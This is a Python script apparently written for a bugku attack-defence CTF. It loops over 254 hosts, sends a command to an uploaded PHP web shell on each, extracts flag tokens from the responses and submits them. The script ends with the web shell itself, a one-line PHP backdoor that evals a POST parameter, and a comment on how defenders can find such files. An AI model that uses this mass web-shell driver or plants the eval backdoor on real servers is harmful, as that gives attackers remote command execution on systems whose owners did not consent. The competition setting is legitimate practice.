ShellUse.py
from typing import Pattern
import requests
import re
from lib.log import outputscreen
from submitFlag import submit_flag
'''Match the flag using a regex / slice'''
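def extract_flag(content):
    """Return the first ``flag{...}`` token found in *content*.

    Args:
        content: Text to search, normally a response body returned by a
            remote host. May be ``None`` or empty.

    Returns:
        The whole matched token including the ``flag{`` / ``}`` wrapper, or
        ``''`` when *content* is empty or holds no such token.
    """
    # The input is remote, untrusted text and is frequently empty or missing;
    # without this guard re.search() raises TypeError on None.
    if not content:
        return ''
    # Braces are escaped so they are always literal, and the match is
    # non-greedy so it stops at the first closing brace instead of swallowing
    # everything up to the last '}' on the line.
    match = re.search(r"flag\{.*?\}", content)
    # re.search() returns None when nothing matches; calling .group() on it
    # would raise AttributeError, so map that case to the empty string.
    return match.group(0) if match else ''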
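def web_shell_exec(shell_url,shell_method,shell_password,shell_command):
    """Send one request to *shell_url* and return the response body.

    Args:
        shell_url: Full URL of the endpoint to call.
        shell_method: ``"GET"`` or ``"POST"``; any other value sends nothing.
        shell_password: Name of the request parameter the endpoint reads.
        shell_command: Value sent in that parameter.

    Returns:
        The response text when the endpoint answers HTTP 200, otherwise ``''``.
        Every failure path returns ``''`` so callers always receive a string.
    """
    # info.txt is opened in "w" mode, so it is truncated on every call.
    # The context manager closes the handle on every return path.
    with open("info.txt", "w", encoding="utf-8") as info:
        if shell_method not in ("GET", "POST"):
            return ''
        try:
            if shell_method == "GET":
                # Let requests build and encode the query string.
                res = requests.get(url=shell_url, params={shell_password: shell_command}, timeout=1)
            else:
                res = requests.post(url=shell_url, data={shell_password: shell_command}, timeout=1)
        except requests.RequestException:
            # Only network/HTTP errors are treated as a failed connection;
            # programming errors are no longer hidden by a bare except.
            outputscreen.error(shell_url + " connect shell fail!")
            return ''
        if res.status_code != requests.codes.ok:
            return ''
        # Use the shell_url argument rather than a module-level `url`.
        # NOTE(review): res.text is attacker-controllable remote content; it is
        # echoed to the screen and the log file unfiltered.
        result = shell_url + " connect shell sucess" + res.text
        outputscreen.success(result)
        if shell_method == "GET":
            # Only the GET path wrote to info.txt in the original code.
            print(result, file=info)
        return res.text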
# Values passed through to submit_flag(); presumably placeholders -- confirm.
token = 'test'
event = 'test'

# The command string is the same for every host, so it is built once.
command = 'system("ls");'

# range(1, 255) yields 1..254, one host name per value.
for i in range(1, 255):
    url = f"http://192-168-1-{i}.awd.bugku.cn/upload/admin/shell.php"
    cmdRes = web_shell_exec(url, "POST", "L0nm4r", command)
    flag = extract_flag(cmdRes)
    # Submit only when a flag string was recovered.
    if flag != '':
        submit_flag(url, flag, token, event)

# The bare string below is never used by the program; it is a reference copy
# of the server-side file this script talks to: a PHP one-liner that passes a
# POST parameter to eval(). On the defending side, files of this shape are
# found by searching web roots and upload directories for eval() applied to
# $_POST / $_REQUEST, and by reviewing access logs for POST requests to
# scripts stored under upload paths.
'''
<?php @eval($_POST["l0nm4r"]);?>
'''